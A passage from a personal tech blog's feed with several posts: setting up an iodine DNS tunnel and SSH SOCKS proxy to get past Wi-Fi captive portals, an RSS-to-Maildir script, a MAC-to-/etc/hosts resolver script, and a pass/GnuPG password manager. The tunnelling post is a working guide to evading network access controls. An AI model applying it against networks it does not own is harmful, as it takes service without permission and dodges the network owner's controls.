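<p>On the constructed sample only the client talking to <code>t.example.net</code> is flagged; the Google lookups and the single legitimate TXT query for <code>_dmarc.example.org</code> fail the label-length and entropy tests. In practice the zone grouping is what matters: a tunnel shows up as hundreds of unique names under one delegated zone, which is also why port-forwarding UDP 53 to a home server, as the setup below does, is easy for a network owner to spot.</p>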
<h2>What you need to set up:</h2>
<ul>
<li>Spare (Linux) machine at home; this can be an existing server or desktop.</li>
<li><a href="https://en.wikipedia.org/wiki/Dynamic_DNS">Dynamic DNS</a> that resolves to the public IP of the server (explained in this article)</li>
<li>A subdomain that holds an NS (nameserver) record (explained in this article)</li>
<li><a href="http://code.kryo.se/iodine/">Iodine</a> daemon on the server (explained in this article)</li>
<li>Router on which you can set up static IPs and <a href="https://en.wikipedia.org/wiki/Port_forwarding">port forwarding</a></li>
</ul>
<h2>Setting up the DDNS and NS-record</h2>
<p>You can use <a href="https://freedns.afraid.org/">freedns.afraid.org</a> for the <a href="https://en.wikipedia.org/wiki/Dynamic_DNS">dynamic DNS</a> and the <a href="https://en.wikipedia.org/wiki/List_of_DNS_record_types#NS">NS-record</a>. So make an account and go to “subdomains”. You need to make two subdomains: one normal A-record (domain name to IP) and one of type NS whose destination is the A-record, so that it points to the public IP of the server at home.</p>
<p><img src="/assets/iodine1.png" alt="setup ddns on site" /></p>
<p>For the A-record fill in a subdomain (can be anything, just remember it) and choose a domain (these are donated by a large community to use). Fill in the captcha and done.</p>
<p>For the NS-record do the same, but set the destination to the A-record you just made (<subdomain>.<domain>).</p>
<p>The IP of the A-record was auto-filled when the subdomain was created, but it needs to be updated periodically by the server so it keeps pointing at the public IP of your home router with the server behind it. There are many ways to do this (<a href="https://freedns.afraid.org/scripts/freedns.clients.php">can be found here</a>), but one of the easiest is fetching a URL with a curl command every 60 seconds. If you go to <a href="https://freedns.afraid.org/dynamic/">freedns.afraid.org/dynamic</a>, you can choose the subdomain of your A-record and get the link behind ‘direct link’.</p>
<p><img src="/assets/iodine2.png" alt="extra setup" /></p>
<p>It looks like this:</p>
<pre>https://freedns.afraid.org/dynamic/update.php?<your-key></pre>
<p><strong>ddns.sh:</strong></p>
<pre class="output">#!/bin/sh
# Refresh the freedns.afraid.org A-record every 60 seconds.
# The URL is quoted because '?' and '&lt;' are special to the shell.
while true
do
curl "https://freedns.afraid.org/dynamic/update.php?<your-key>"
sleep 60
done</pre>
<p>Put this on the server at home. This is a script that calls the url every 60 seconds so it keeps updated over time. You probably want to execute it on boot. On a system with systemd you can use this service file:</p>
<p><strong>/usr/lib/systemd/system/ddns.service:</strong></p>
<pre class="output">[Unit]
After=network.target
Requires=network.target
[Service]
ExecStart=/usr/bin/sh /root/ddns.sh
[Install]
WantedBy=multi-user.target</pre>
<p>Then run these commands to check if it works and if so, make it persistent.</p>
<pre>sudo systemctl start ddns.service
sudo systemctl status ddns.service #check if ok
sudo systemctl enable ddns.service #make it persistent over boot</pre>
<p>Now if you ping your A-record subdomain you will get the IP of your router at home. The ddns.service will keep it that way.</p>
<h2>Configuring the Iodine-daemon</h2>
<p>First you have to install the iodine program on the server at home, find it in the repository as “iodine” or “iodine-server”. For Arch-Linux this is the following command:</p>
<pre>pacman -Sy iodine</pre>
<p>Now you want to configure the daemon with the info of your record and make it start at boot. This is the command that has to run on boot:</p>
<pre>/usr/bin/iodined -f -c -l $IODINE_BIND_ADDRESS -n $IODINE_EXT_IP -p $IODINE_PORT -P $IODINE_PASSWORD -u $IODINE_USER $TUN_IP $TOP_DOMAIN</pre>
<p>On Arch-Linux the service file is already supplied and the settings can be found at <strong>/etc/conf.d/iodined</strong> (you only need TOP_DOMAIN and IODINE_PASSWORD):</p>
<pre class="output"># Address and subnet to use for the tunnel (default mask is /27)
TUN_IP="172.18.42.1/24"
# Password (32 characters max)
IODINE_PASSWORD="mypassword"
# The domain you control, see documentation.
TOP_DOMAIN="<subdomain>.<domain>.com"
# UDP port iodined should listen on.
IODINE_PORT="53"
# Local IP address iodined should bind to.
IODINE_BIND_ADDRESS="0.0.0.0"
# External IP of your iodined server, used in DNS answers.
IODINE_EXT_IP=""
# The user iodined should run as.
IODINE_USER="nobody"</pre>
<p>When ready run these commands to make it run at boot on an Arch-Linux system:</p>
<pre>sudo systemctl start iodined.service
sudo systemctl status iodined.service
sudo systemctl enable iodined.service</pre>
<p><em>Note: You really want to set a password. It is for authentication only, so that not everybody can use your DNS tunnel; it does not give you encryption, and the tunnel traffic itself is not encrypted in any way.</em></p>
<p>Now you need to port-forward port 53 (the port DNS uses) on your home router to the device you use as server. This is different for every router, but generally you also want to make the internal IP of this device “static” so it does not change after a reboot. Now your Iodine daemon is reachable from outside your network.</p>
<p>You can check whether everything is set up properly by filling it in on this page: <a href="http://code.kryo.se/iodine/check-it/">http://code.kryo.se/iodine/check-it/</a>. It will tell you where it failed if something is not in order. If it works, let’s bypass some captive portals!</p>
<h2>Usage</h2>
<p>You should install the <a href="http://code.kryo.se/iodine/">iodine</a>-client before you get stuck somewhere without internet.</p>
<p>It is found in many repositories as “iodine” or “iodine-client”. On Arch-Linux:</p>
<pre>pacman -Sy iodine</pre>
<p>Then, to use this technique when you are behind a captive portal, make sure you are connected to the hotspot. Once you have confirmed with the ping method from the first part of this article that DNS passes through the captive portal, run the following command (it will ask for the password if one is set):</p>
<pre>iodine <subdomain>.<domain></pre>
<pre class="output">Enter password:
Opened dns0
Opened IPv4 UDP socket
Sending DNS queries for ****.****.*** to 192.168.1.1
Autodetecting DNS query type (use -T to override).
Using DNS type NULL queries
Version ok, both using protocol v 0x00000502. You are user #0
Setting IP of dns0 to 172.18.42.2
Setting MTU of dns0 to 1130
Server tunnel IP is 172.18.42.1
Testing raw UDP data to the server (skip with -r)
Server is at 192.168.1.2, trying raw login: OK
Sending raw traffic directly to 192.168.1.2
Connection setup complete, transmitting data.
Detaching from terminal...</pre>
<p>Awesome! We have a tunnel. Now we can contact every port on the server at 172.18.42.1, for example we can SSH to the server:</p>
<pre>ssh user@172.18.42.1</pre>
<p>Now to tunnel an internet connection through, you can use the built-in SOCKS proxy of SSH. To use it, supply the -D option with a local port to put the proxy on. All traffic of a program that you point at the proxy will be tunneled over the SSH connection. Example of the command:</p>
<pre>ssh user@172.18.42.1 -D 5000</pre>
<p>Research how to setup your programs on your system to use the proxy or use this quick tip which explains how to <a href="https://larsveelaert.github.io/2017/02/02/running-a-terminal-command-through-a-proxy/">run commands through a proxy</a>.
There is also a transparent way that tunnels all internet through a ssh tunnel <a href="https://larsveelaert.github.io/2017/02/17/poor-man-vpn/">explained here</a>.</p>
<p>Hope you learned something about how the internet works and have some free internet in the meanwhile. Have fun!</p>Lars VeelaertReceive all your web updates in your mailbox with rss2email2017-09-29T00:00:00+00:002017-09-29T00:00:00+00:00https://lvlrt.github.io/2017/09/29/get-all-your-updates-in-your-mailbox-with-rss<p><img src="/assets/rss.jpg" alt="header rss article" /></p>
<p>So I have a couple of sites I check regularly… YouTube, a couple of blogs, Reddit pages, LinkedIn and some news sites. Often I miss an interesting article, or, in general, I have to remember to check them. It’s not very productive to feel that you have to check everything, all the time.</p>
<p>A good way to go about this is subscribing to newsletters and reviewing the settings of your online accounts to have messages sent to your mail inbox. Great, but not every simple site has this option, and newsletters are often too bloated with ads and calls to action to be fun to read.</p>
<p>I’ve wanted to solve this problem for quite a while but never found a good solution. My general philosophy is having everything on every device work in exactly the same way. I make sure I get a terminal on every device, and from there I open my Linux environment with all my tools set up and synced.</p>
<h2>And then I discovered RSS</h2>
<p>Most sites today offer an RSS feed. This is a file that resides somewhere on the domain (often linked somewhere on the homepage) and is a very simple XML file that holds a summary of the meaningful changes to a site. Most engines like WordPress and Joomla have it by default. And any major site will support it (I haven’t found one that does not). Sometimes a Google search is needed to find the right URL for sites like Reddit, but it’s (nearly) always there.</p>
<h2>The problem</h2>
<p>So if you have all the links to your RSS feeds, you can put them in a program that handles all the news for you.
In the early days there was <a href="https://www.google.com/reader/about/">Google Reader</a> but that is gone right now (it did not fit the Google marketing anymore).
There are apps like <a href="https://feedly.com/">Feedly</a> to replace it and many <a href="https://www.howtogeek.com/128487/the-best-free-rss-readers-for-keeping-up-with-your-favorite-websites/">others</a>.</p>
<p>These are definitely great, but I don’t like standalone programs. I’d like my news to end up in my mailbox. I tried online RSS-to-email converters like <a href="https://blogtrottr.com/">Blogtrottr</a> but never really liked it. It failed often and I had to go online and log in to add extra feeds. I also like to use as few resources or services as possible.</p>
<p>Then local converters such as <a href="https://www.google.be/url?sa=t&rct=j&q=&esrc=s&source=web&cd=2&cad=rja&uact=8&ved=0ahUKEwiBm8yikMrWAhWBCBoKHfDdDi0QFggwMAE&url=http%3A%2F%2Fnewspipe.sourceforge.net%2F&usg=AFQjCNEANFszQVtDJDB4BQN6CgfnLXsc4w">newspipe</a> and <a href="http://www.allthingsrss.com/rss2email/">rss2email</a> got my attention, but the main page was down, and rss2email needed a specific format to read the links from and would write my mails into an older, incompatible mailbox format.</p>
<h2>The DIY fix</h2>
<p>So I realized <a href="http://www.allthingsrss.com/rss2email/">rss2email</a> was written in Python (Yes!) and most of its heavy lifting was done by a module called “feedparser”. So I wrote my own script to take a list of URLs (of RSS feeds) and add the entries to my local inbox in Maildir format (I use the terminal application <a href="https://nl.wikipedia.org/wiki/Mutt">mutt</a> for my email). Many email programs use this standardized format, so check whether yours is compatible. If you want to read a great article on how to set up Mutt, I recommend <a href="https://wiki.archlinux.org/index.php/mutt">this Arch Linux post</a> and <a href="http://stevelosh.com/blog/2012/10/the-homely-mutt/">The Homely Mutt</a>.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>...
41 N Jan 03 RecentQuestions (2.4K) [SE TOR] Clearing the client side DNS cache provides privacy improvement?
42 N Jan 03 RecentQuestions (0.8K) [SE TOR] How to make VPN like Tor faster ? or is there any VPN like Tor but faster?
43 N Jan 03 RecentQuestions (3.2K) [SE TOR] Clearing the state of rendezvous client provides privacy improvement?
44 N Jan 03 LinusTechTips (1.6K) [LTT] 5 Gadgets to help you Wake-Up
45 N Jan 03 BryanLunduke (0.7K) [YT BRYAN LUNDUKE] Weekly Tech News - Jan 3rd, 2018
46 N Jan 03 reddit.be (0.7K) [REDDIT BELGIUM] Wat de Nederlandse oud-premier Dries van Agt (1977-1982) vanavond op
47 N Jan 03 Crypt0 (2.8K) [CRYPTO] Ripple: The New World Order Coin? / BTC's Birthday! / Intel's BIG Mistake /
48 N Jan 03 VICENews (1.9K) [VICE NEWS] The Darkest Place In America & Marines In Afghanistan: VICE News Tonight
49 N Jan 04 VICENews (2.2K) [VICE NEWS] Scientists Can Now Quickly Link Extreme Weather Events To Climate Change
50 N Jan 04 VICENews (1.7K) [VICE NEWS] The Making Of Bhad Bhabie (HBO)
...
</code></pre></div></div>
<p>So this is the command you can add to a macro or <a href="https://demgeeks.com/qt-make-the-command-line-easier-with-aliases-and-functions/">alias</a> to fetch the feeds from the <em>rss.txt</em> file in the <em>~/RSS/</em> directory and parse them offline into emails, which will be added to <em>~/MAILDIR/account/INBOX</em>:</p>
<pre>python ~/rss2maildir.py ~/RSS ~/MAILDIR/account/INBOX</pre>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>...
0 found!
checking: http://www.reddit.com/r/belgium/.rss
0 found!
checking: https://tor.stackexchange.com/feeds
0 found!
checking: https://security.stackexchange.com/feeds
...
</code></pre></div></div>
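<p>The same parse-and-deliver loop as a self-contained added example (this is not the rss2maildir script from the repo below): it parses an RSS 2.0 or Atom document with the standard library, writes each new entry as a text/plain mail into a Maildir through the stdlib <code>mailbox</code> module, and skips entries it has already delivered. The two feed documents, the Maildir path and the feed tag are constructed for the demo.</p>

```python
import hashlib
import mailbox
import os
import tempfile
import xml.etree.ElementTree as ET
from email.message import EmailMessage
from email.utils import formatdate

# Constructed sample feeds (not fetched from any real site): one RSS 2.0, one Atom.
SAMPLE_RSS = """<?xml version="1.0"?>
<rss version="2.0"><channel><title>Example Feed</title>
<item><title>First post</title><link>https://feed.example/posts/1</link>
<guid>https://feed.example/posts/1</guid>
<description>&lt;p&gt;Hello &lt;b&gt;world&lt;/b&gt;&lt;/p&gt;</description></item>
<item><title>Second post</title><link>https://feed.example/posts/2</link>
<guid>https://feed.example/posts/2</guid><description>Plain summary</description></item>
</channel></rss>
"""
SAMPLE_ATOM = """<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom"><title>Example Atom Feed</title>
<entry><title>Atom post</title><link href="https://feed.example/atom/1"/>
<id>urn:example:atom:1</id><summary>Atom summary</summary></entry>
</feed>
"""
ATOM = "{http://www.w3.org/2005/Atom}"


def parse_feed(xml_text):
    """Return the entries of an RSS 2.0 or Atom document as dicts (id, title, link, summary)."""
    root = ET.fromstring(xml_text)
    entries = []
    if root.tag == "rss":
        for item in root.iter("item"):
            link = item.findtext("link", "").strip()
            entries.append({"id": item.findtext("guid") or link,
                            "title": item.findtext("title", "(no title)"),
                            "link": link,
                            "summary": item.findtext("description", "")})
    elif root.tag == ATOM + "feed":
        for entry in root.iter(ATOM + "entry"):
            link_el = entry.find(ATOM + "link")
            link = link_el.get("href", "") if link_el is not None else ""
            entries.append({"id": entry.findtext(ATOM + "id") or link,
                            "title": entry.findtext(ATOM + "title", "(no title)"),
                            "link": link,
                            "summary": entry.findtext(ATOM + "summary", "")})
    return entries


def deliver(entries, maildir_path, seen_ids, feed_tag):
    """Write every not-yet-seen entry as a text/plain mail into the Maildir; return the count.
    seen_ids holds hashes of delivered entry ids (a real run would persist it between
    invocations, which is what lets a second run report "0 found!")."""
    box = mailbox.Maildir(maildir_path, create=True)
    added = 0
    try:
        for e in entries:
            key = hashlib.sha256(e["id"].encode()).hexdigest()
            if key in seen_ids:
                continue
            msg = EmailMessage()
            msg["From"] = f"{feed_tag} <rss@localhost>"
            msg["To"] = "me@localhost"
            msg["Subject"] = f"[{feed_tag}] {e['title']}"
            msg["Date"] = formatdate(localtime=True)
            msg["Message-ID"] = f"<{key}@rss2maildir.invalid>"
            # Feed content is untrusted remote data: deliver it as text/plain so the mail
            # client shows any markup literally instead of rendering it.
            msg.set_content(f"{e['link']}\n\n{e['summary']}\n")
            box.add(msg)
            seen_ids.add(key)
            added += 1
    finally:
        box.close()
    return added


def demo():
    """Deliver the RSS sample twice into a throwaway Maildir: (first run, second run, subjects)."""
    inbox = os.path.join(tempfile.mkdtemp(prefix="rss2maildir-"), "INBOX")
    seen = set()
    first = deliver(parse_feed(SAMPLE_RSS), inbox, seen, "EXAMPLE")
    second = deliver(parse_feed(SAMPLE_RSS), inbox, seen, "EXAMPLE")
    subjects = sorted(m["Subject"] for m in mailbox.Maildir(inbox))
    return first, second, subjects
```

<p>For feeds fetched from the network, parse with <code>defusedxml</code> rather than <code>xml.etree</code> directly, since a hostile feed can carry entity-expansion payloads.</p>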
<p>You can find the script and an example rss.txt in <a href="https://github.com/polarsbear/rss2maildir">this Github-repo</a>. Feel free to give tips and share your experiences!</p>Lars VeelaertARP-A-HOST, a script to resolve local network hostnames without extra services2017-09-27T00:00:00+00:002017-09-27T00:00:00+00:00https://lvlrt.github.io/2017/09/27/resolve-local-network-hostnames<p>I was in desperate need to find a way to not always have to scan the network or go over to another device to know its IP so I could ssh into it or use a service it was serving. This is what I found.</p>
<p>The internet is just a lot of devices, which can be addressed with an <a href="https://en.wikipedia.org/wiki/IP_address">IP address</a>. Those are unique in every network. To make the network more usable we use <a href="https://en.wikipedia.org/wiki/Domain_name">domain names</a> with logical, easy to remember names like www.google.com or www.facebook.com.</p>
<p>This works by contacting a server with a fixed IP which provides <a href="https://nl.wikipedia.org/wiki/Domain_Name_System">DNS</a>, resolving your domain name into an IP that your browser can go to. DNS servers for the global internet are managed by governments and maintained by big companies like Google. This is why, if you want a domain name, it comes with a fee…</p>
<p>On local networks, it’s overkill (and quite some setup) to have a <a href="https://www.lifewire.com/what-is-a-dns-server-2625854">DNS server</a> to resolve the IPs of devices, but other programs like <a href="https://nl.wikipedia.org/wiki/Zeroconf">zeroconf</a> and <a href="https://en.wikipedia.org/wiki/Multicast_DNS">mDNS</a> tried to take a more low-maintenance approach to this problem. Short story: still not ideal. You still have to have services running on all devices to ensure that your device gets registered…</p>
<h2>The solution</h2>
<p>The ideal solution consists of:</p>
<ul>
<li>No changes needed to the network (so it works everywhere)</li>
<li>Reliable</li>
<li>Very little setup on the device itself and no services need to be running</li>
<li>Cross-platform</li>
</ul>
<p>The idea is to maintain a list of <a href="https://en.wikipedia.org/wiki/MAC_address">MAC addresses</a> of the devices I use (and sync those with <a href="https://www.dropbox.com/">Dropbox</a> or <a href="https://git-scm.com/">Git</a>), scan the network for these <a href="https://en.wikipedia.org/wiki/MAC_address">MAC addresses</a> and, if found, add them to the /etc/hosts file. This is reliable because MAC addresses are hard-coded in your hardware. You only need to know the MAC of your other devices and you can identify them. Every device has to have one. Adding to the /etc/hosts file is supported by the core of Linux, so it is quite cross-platform on any device you can get Linux working on.</p>
<p>So whenever my network setup changes, or it has been a while and addresses may have switched, I run the following command:</p>
<pre>bash ./ARP-A-HOST.sh ./HOSTS_MACS</pre>
<p><strong>ARP-A-HOST.sh script:</strong></p>
<pre>#!/bin/bash
#DEPENDENCIES: arp-scan
#take $1 (first argument of the script) -> file with MAC addresses + hostname
#optional $2 -> interface to scan (default: every interface listed by ip link)
tmpfile=$(mktemp /tmp/DYNAMIC-RESOLVE.XXXXXX) #tmp file for temporary results
#clear lines from the previous run in the /etc/hosts file
sed -i.bak '/DYNAMIC_RESOLVE/d' /etc/hosts
#use the tool arp-scan to find all the devices on the network
if [ -n "$2" ]; then
    arp-scan --localnet --interface="$2" >> "$tmpfile"
else
    #ip -o prints one interface per line; strip the "@ifN" suffix that veth-style names carry
    for interface in $(ip -o link | awk -F': ' '{print $2}' | cut -d@ -f1); do
        arp-scan --localnet --interface="$interface" 2>/dev/null >> "$tmpfile"
    done
    #TODO interfaceoption -> default wlan
fi
echo "Arpscan finished... Filtering results..."
#reading the MAC list one line at a time: mac, space, name
while read -r MAC NAME; do
    case "$MAC" in ''|'#'*) continue ;; esac #skip blank lines and comments
    #look the MAC up in the arp-scan results (IP, MAC, vendor, tab separated), first match only
    IP=$(grep -i -m1 "$MAC" "$tmpfile" | cut -d$'\t' -f 1)
    if [ -n "$IP" ]; then
        echo "Found $NAME at $IP! Adding to /etc/hosts..."
        echo "$IP $NAME $NAME #DYNAMIC_RESOLVE" >> /etc/hosts #If the MAC is found, add to the /etc/hosts file
    fi
done < "$1"
rm -f "$tmpfile"
echo "Done with discovering hosts"</pre>
<p><strong>HOSTS_MACS file:</strong></p>
<pre>00:90:f5:d6:5b:05 c1
c0:ee:fb:59:fc:23 s1
10:02:b5:d6:08:8a o1
b8:27:eb:4e:0c:42 kh1</pre>
<p>The second file is just a list of MAC addresses, each followed by a name of your choice. You can find your MAC address in various ways, but the easiest is just running the ifconfig command on Linux (look next to “ether”):</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>[root@localhost]# ifconfig
wlan0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 192.168.1.13 netmask 255.255.255.0 broadcast 192.168.1.255
ether 10:02:b5:d6:08:8a txqueuelen 1000 (Ethernet)
RX packets 221361 bytes 303819415 (289.7 MiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 112644 bytes 15169217 (14.4 MiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
...
</code></pre></div></div>
<p>You will need the tool arp-scan to run this script; you can find it in nearly all repositories. I run this script on an Android phone, a desktop, a Chromebook and a Raspberry Pi. So no worries.</p>
<p>If you check the /etc/hosts file you can see the following has changed:</p>
<pre>#
# /etc/hosts: static lookup table for host names
#
#<ip-address> <hostname.domain.org> <hostname>
127.0.0.1 localhost.localdomain localhost
::1 localhost.localdomain localhost
# End of file
192.168.1.3 s1 s1 #DYNAMIC_RESOLVE
192.168.1.2 kh1 kh1 #DYNAMIC_RESOLVE</pre>
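<p>The lookup-and-append step in Python, as an added example that is not part of the ARP-A-HOST repo: it parses a constructed arp-scan listing and HOSTS_MACS file, validates what may go into /etc/hosts, and refuses to map a MAC that answers from more than one IP, because ARP replies are unauthenticated and a second answer can be a spoofed or re-addressed device. Nothing here writes /etc/hosts; the caller does that with the returned text.</p>

```python
import re

# Constructed sample of `arp-scan --localnet` output (tab-separated IP, MAC, vendor).
# The Raspberry Pi MAC deliberately answers from two IPs, once in upper case.
SAMPLE_SCAN = (
    "192.168.1.3\tc0:ee:fb:59:fc:23\tSamsung Electronics\n"
    "192.168.1.2\tb8:27:eb:4e:0c:42\tRaspberry Pi Foundation\n"
    "192.168.1.9\tB8:27:EB:4E:0C:42\tRaspberry Pi Foundation\n"
    "192.168.1.7\t00:11:22:33:44:55\tUnknown vendor\n"
)
# Constructed MAC list in the article's HOSTS_MACS format: "<mac> <name>" per line.
SAMPLE_MACS = "c0:ee:fb:59:fc:23 s1\nb8:27:eb:4e:0c:42 kh1\n10:02:b5:d6:08:8a o1\n"

MAC_RE = re.compile(r"^[0-9a-f]{2}(?::[0-9a-f]{2}){5}$")
NAME_RE = re.compile(r"^[A-Za-z0-9][A-Za-z0-9-]*$")  # only this may become a hosts entry name
TAG = "#DYNAMIC_RESOLVE"


def parse_macs(text):
    """HOSTS_MACS text -> {mac: name}; rejects malformed MACs and names that could
    smuggle extra tokens (whitespace, '#') into /etc/hosts."""
    names = {}
    for line in text.splitlines():
        parts = line.split()
        if not parts or parts[0].startswith("#"):
            continue
        if len(parts) != 2:
            raise ValueError(f"expected '<mac> <name>', got {line!r}")
        mac, name = parts[0].lower(), parts[1]
        if not MAC_RE.match(mac):
            raise ValueError(f"bad MAC address: {parts[0]}")
        if not NAME_RE.match(name):
            raise ValueError(f"bad host name: {name}")
        names[mac] = name
    return names


def parse_scan(text):
    """arp-scan output -> {mac: set of IPs that claimed it}; banner/summary lines are skipped.
    A phone with MAC randomisation enabled will simply never match its listed MAC."""
    seen = {}
    for line in text.splitlines():
        fields = line.split("\t")
        if len(fields) < 2 or not MAC_RE.match(fields[1].lower()):
            continue
        seen.setdefault(fields[1].lower(), set()).add(fields[0])
    return seen


def resolve(names, seen):
    """Return (hosts_lines, conflicts). A MAC answering from more than one IP is not mapped:
    ARP replies are unauthenticated, so the second answer may be a spoofed address or a
    device that just moved, and `ssh name` must not silently land on the wrong host."""
    lines, conflicts = [], {}
    for mac, name in names.items():
        ips = seen.get(mac)
        if not ips:
            continue
        if len(ips) > 1:
            conflicts[name] = sorted(ips)
            continue
        (ip,) = ips
        lines.append(f"{ip} {name} {name} {TAG}")
    return lines, conflicts


def update_hosts(hosts_text, new_lines):
    """Drop the previous run's tagged lines (the script's sed '/DYNAMIC_RESOLVE/d' step)
    and append the new ones; returns the new file content instead of writing /etc/hosts."""
    kept = [line for line in hosts_text.splitlines() if TAG not in line]
    return "\n".join(kept + new_lines) + "\n"


if __name__ == "__main__":
    found, clashes = resolve(parse_macs(SAMPLE_MACS), parse_scan(SAMPLE_SCAN))
    print("\n".join(found))
    for name, ips in clashes.items():
        print(f"# CONFLICT: {name} answered from {', '.join(ips)}; not mapped")
```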
<p>You can now use the hostnames in most commands and have them automatically resolved;</p>
<pre>ssh s1 #resolves to the IP address of my phone
ssh root@kh1 -p 22 #same but with more arguments</pre>
<p>You can alias the <em>ARP-A-HOST.sh</em> script command in your <a href="https://demgeeks.com/qt-make-the-command-line-easier-with-aliases-and-functions/">bashrc</a> to make it easier to use. There is also <a href="https://github.com/larsveelaert/ARP-A-HOST">a Github-repo</a> that contains all the files needed.</p>
<p>That’s it! have fun!</p>Lars VeelaertSetting Up a GnuPG-based Password Manager2017-09-23T00:00:00+00:002017-09-23T00:00:00+00:00https://lvlrt.github.io/2017/09/23/gnupg-based-password-manager<p><img src="/assets/encryption.jpg" alt="Header" /></p>
<p>In this article we will set up a secure password manager. You probably use the same password over and over again on multiple sites/devices/applications. Not so great! If one service gets compromised, an attacker can wreak some serious havoc. <strong>YOU SHOULD USE DIFFERENT PASSWORDS!</strong></p>
<p>But this is hard, so many people store their passwords in a passwords.txt file on their desktop, or even better, in a service like Dropbox, storing all passwords together and keeping that file synced. Copying passwords will also circumvent <a href="https://en.wikipedia.org/wiki/Keystroke_logging">keyloggers</a> active on your system. So awesome, right?!</p>
<p>Not really. If one of your devices gets compromised, or Dropbox makes a mistake, you are screwed. You should still have an extra layer of access protection between the file and the passwords; syncing with Dropbox can be fine, but you have to encrypt the file.</p>
<h2>About password managers</h2>
<p>One option is using tools like <a href="http://keepass.info/">Keepass</a> or <a href="https://1password.com/">1Password</a>.
But you are depending on that service; it’s not modular (you cannot choose the way it gets synced).
I don’t like trusting these services.
Not only the communication but things like encryption type, memory leaks and temporary files can all be badly designed.
<a href="https://www.coredna.com/blogs/comparing-open-closed-source-software">Open-source</a> tools are the way to go, because you can trust AND verify.</p>
<p>The best way to do this is with <a href="https://en.wikipedia.org/wiki/Public-key_cryptography">asymmetric encryption</a>.
There are standards such as <a href="https://nl.wikipedia.org/wiki/Pretty_Good_Privacy">PGP</a> (<a href="https://www.gnupg.org/">GnuPG</a> on Linux) that make this easy.
The encryption is very strong because you use a long encryption key to decrypt your target file.</p>
<p>The long encryption key is stored locally on your machines, and you need a passphrase to use it.
So even if someone gets access to the long, secure encryption key (the private key), they will still need the passphrase.</p>
<p>This is not all that <a href="https://www.gnupg.org/">GnuPG</a> can do; it is an amazing piece of work, and if you are interested, you should check it out.
A nice place to get started with using it is this <a href="https://wiki.archlinux.org/index.php/GnuPG">Arch Linux page</a> about GnuPG.</p>
<p>I use the terminal everywhere, and there is a CLI tool named <a href="https://wiki.archlinux.org/index.php/Pass">pass</a> that automates the usage of GnuPG for passwords. We will use that to manage our passwords.
The cool thing about the pass password manager is its uniform cross-platform behavior. Once you know how to use it on one platform, you know it on all your other devices (more on syncing the passwords later).</p>
<h2>Dependencies</h2>
<p>You first have to install pass and GnuPG and, more importantly, set up GnuPG and have it make a key for you (you can of course use an already existing key, but then you would not be reading this). Do what is right for your system:</p>
<p><strong>Debian-based;</strong></p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>sudo apt-get install pass gnupg
</code></pre></div></div>
<p><strong>Arch Linux; </strong></p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>sudo pacman -Sy pass gnupg
</code></pre></div></div>
<h2>Setup your encryption key</h2>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>gpg --full-gen-key
</code></pre></div></div>
<p>Now gpg will ask you a couple of questions, like what kind of key you want; press 1.
I chose a key size of 4096, which is the highest possible. Then put in 0 for a key that never expires, and confirm your choice.
Then it will ask for a name, email and comment (like “created pm 27/12/2016”).
Confirm by pressing <code class="language-plaintext highlighter-rouge">O</code> and ENTER. Then STOP!</p>
<p>You should now have the following output:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>[root@localhost ~]# gpg --full-gen-key
gpg (GnuPG) 2.2.4; Copyright (C) 2017 Free Software Foundation, Inc.
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.
Please select what kind of key you want:
(1) RSA and RSA (default)
(2) DSA and Elgamal
(3) DSA (sign only)
(4) RSA (sign only)
Your selection? 1
RSA keys may be between 1024 and 4096 bits long.
What keysize do you want? (2048) 4096
Requested keysize is 4096 bits
Please specify how long the key should be valid.
0 = key does not expire
<n> = key expires in n days
<n>w = key expires in n weeks
<n>m = key expires in n months
<n>y = key expires in n years
Key is valid for? (0) 0
Key does not expire at all
Is this correct? (y/N) y
GnuPG needs to construct a user ID to identify your key.
Real name: lvlrt
Email address: gpg@larsveelaert.com
Comment: Thisismycomment
You selected this USER-ID:
"lvlrt (Thisismycomment) <gpg@larsveelaert.com>"
Change (N)ame, (C)omment, (E)mail or (O)kay/(Q)uit? O
We need to generate a lot of random bytes. It is a good idea to perform
some other action (type on the keyboard, move the mouse, utilize the
disks) during the prime generation; this gives the random number
generator a better chance to gain enough entropy.
Please enter the passphrase to
protect your new key
Passphrase:
</code></pre></div></div>
<p>Now start a YouTube video and set up a file copy to and from your disk for ten minutes or so.
Then go back to your console: it will have asked for a passphrase. Enter the passphrase while your device is doing the heavy work. Confirm and you are done.</p>
<p>You can close the YouTube video and stop the file transfer. This was to generate some activity on the machine, which gives the random number generator more entropy for the key!</p>
<p>To check that the key was created successfully, run the following command:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>[root@localhost ~]# gpg --list-keys
...
----------------------------
pub rsa2048 2018-01-10 [SC]
927A1402D78C9188216F233841CB4088BBF533E9
uid [ultimate] lvlrt (test) <gpg@larsveelaert.com>
</code></pre></div></div>
<p>Great! Now set up pass with the following command, where the <code class="language-plaintext highlighter-rouge"><id></code> value is the email address or name you just entered:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>pass init <id>
</code></pre></div></div>
<p>Then it will output the following:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>[root@localhost ~]# pass init gpg@larsveelaert.com
mkdir: created directory '/home/king/.password-store/'
Password store initialized for gpg@larsveelaert.com
</code></pre></div></div>
<p>Setup done!</p>
<h2>Usage</h2>
<p><strong>To insert a password in your password-store:</strong></p>
<pre>pass insert stuffathome/thingseverybodyshouldknow/wifipassword</pre>
<p>You can add or remove ‘/’ separators to divide your password store further.</p>
<p>Each level simply becomes a subdirectory inside the store.</p>
<p>To have pass generate a random password for you instead (if you want to be extra safe) and store it in an encrypted file:</p>
<pre>pass generate stuffathome/thingseverybodyshouldknow/wifipassword</pre>
